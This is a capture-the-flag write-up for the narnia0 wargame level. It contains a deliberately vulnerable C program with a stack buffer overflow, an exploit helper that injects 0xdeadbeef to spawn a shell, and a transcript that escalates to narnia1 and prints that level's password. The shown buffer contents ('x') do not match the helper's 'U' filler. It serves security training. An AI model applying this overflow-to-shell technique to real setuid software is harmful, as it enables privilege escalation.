narnia0

/* narnia0.c */
/*
    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
*/
#include <stdio.h>
#include <stdlib.h>

/*
 * narnia0 challenge program: a deliberately vulnerable training exercise.
 *
 * Reads one whitespace-delimited token from stdin into a 20-byte stack
 * buffer, prints the buffer and `val`, and runs /bin/sh only if `val`
 * equals 0xdeadbeef. Nothing in this function assigns `val` after its
 * initialisation, so the shell branch is reachable only through the
 * out-of-bounds write described at the scanf() call.
 *
 * Returns 0 after system() returns; calls exit(1) if `val` does not match.
 *
 * NOTE(review): the code is left byte-identical because the exercise depends
 * on this exact flaw and on the compiler's stack layout.
 */
int main(){
	/* Sentinel value; the program itself never changes it. */
	long val=0x41414141;
	/* 20 bytes: room for at most 19 characters plus the terminating NUL. */
	char buf[20];

	printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
	printf("Here is your chance: ");
	/*
	 * DEFECT (intentional): the field width 24 exceeds the buffer. scanf may
	 * store up to 24 characters plus a NUL (25 bytes) into the 20-byte buf,
	 * an out-of-bounds stack write and undefined behaviour. What lies past
	 * buf is decided by the compiler; the transcript on this page shows val
	 * being changed on the target build. A safe call is
	 * scanf("%19s", buf): width = sizeof buf - 1.
	 * Also, &buf has type char (*)[20] rather than the char * that %s
	 * expects; pass buf itself. The return value of scanf is not checked.
	 */
	scanf("%24s",&buf);

	printf("buf: %s\n",buf);
	/* %08x expects unsigned int but val is long; %08lx would match the type. */
	printf("val: 0x%08x\n",val);

	/* Only reachable with val == 0xdeadbeef if memory was corrupted above. */
	if(val==0xdeadbeef)
		/*
		 * Spawns a shell with this process's privileges.
		 * NOTE(review): the transcript shows the shell running as narnia1,
		 * so the installed binary is presumably setuid -- confirm.
		 */
		system("/bin/sh");
	else {
		printf("WAY OFF!!!!\n");
		exit(1);
	}

	return 0;
}


/* hacker0.c */
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <stdlib.h>

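/*
 * Write all `len` bytes of `data` to `fd`, retrying after short writes.
 * Returns 0 on success, -1 if write() fails or makes no progress.
 */
static int write_all(int fd, const char *data, size_t len)
{
        while (len > 0) {
                ssize_t n = write(fd, data, len);

                if (n <= 0)
                        return -1;
                data += n;
                len -= (size_t)n;
        }
        return 0;
}

/*
 * Helper from the write-up: runs the program named by argv[1] with its
 * stdin connected to a pipe, sends a fixed 24-byte prefix, then relays this
 * process's own stdin to the child line by line until EOF.
 *
 * The prefix is 20 filler bytes (the size of buf in narnia0.c) followed by
 * ef be ad de, the little-endian encoding of 0xdeadbeef.
 *
 * Changes from the original listing:
 *  - gets() cannot bound its write into `buffer` (and was removed in C11);
 *    input is now read with fgets() and the buffer size.
 *  - argv[1] is checked before use; the original dereferenced it blindly.
 *  - fork(), dup2(), write() and execle() failures are reported, and a
 *    failed exec ends the child instead of falling through to `return 0`.
 *
 * Returns 0 once stdin is exhausted, 1 on a usage or setup error.
 */
int main(int argc, char *argv[])
{
        char buffer[2048] = {0};
        int pfd[2] = {0};
        pid_t pid;

        if (argc < 2) {
                fprintf(stderr, "usage: %s <program>\n",
                        argc > 0 ? argv[0] : "hacker0");
                return 1;
        }

        if (pipe(pfd)) {
                perror("pipe");
                return 1;
        }

        pid = fork();
        if (pid < 0) {
                perror("fork");
                close(pfd[0]);
                close(pfd[1]);
                return 1;
        }

        if (pid > 0) {
                /* Parent: keeps only the write end of the pipe. */
                close(pfd[0]);
                if (write_all(pfd[1], "UUUUUUUUUUUUUUUUUUUU\xef\xbe\xad\xde", 24) < 0) {
                        perror("write");
                        close(pfd[1]);
                        return 1;
                }

                while (fgets(buffer, sizeof buffer, stdin)) {
                        size_t len = strlen(buffer);

                        /*
                         * fgets keeps the newline. Add one only for a final
                         * line that ended at EOF, not for a chunk that
                         * merely filled the buffer.
                         */
                        if (len > 0 && buffer[len - 1] != '\n' &&
                            len < sizeof buffer - 1)
                                buffer[len++] = '\n';

                        if (write_all(pfd[1], buffer, len) < 0) {
                                perror("write");
                                break;
                        }
                }

                close(pfd[1]);
        } else {
                /* Child: the read end of the pipe becomes stdin. */
                close(pfd[1]);
                if (dup2(pfd[0], STDIN_FILENO) < 0) {
                        perror("dup2");
                        _exit(1);
                }
                close(pfd[0]);

                /*
                 * Variadic NULLs are cast so they are passed as pointers;
                 * the environment argument stays NULL as in the original.
                 */
                execle(argv[1], argv[1], (char *)NULL, (char **)NULL);
                perror("execle");
                _exit(127);
        }

        return 0;
}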


root@today:~# ssh [email protected]

[email protected]'s password: 

narnia0@melinda:~$ cd /tmp/shadowcoder0

narnia0@melinda:/tmp/shadowcoder0$ ls
hacker0.c  narnia0.c

narnia0@melinda:/tmp/shadowcoder0$ gcc hacker0.c -o hacker0 -m32

narnia0@melinda:/tmp/shadowcoder0$ ./hacker0 /narnia/narnia0
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: buf: xxxxxxxxxxxxxxxxxxxxᆳ
val: 0xdeadbeef
whoami
narnia1
cat /etc/narnia_pass/narnia1
efeidiedae

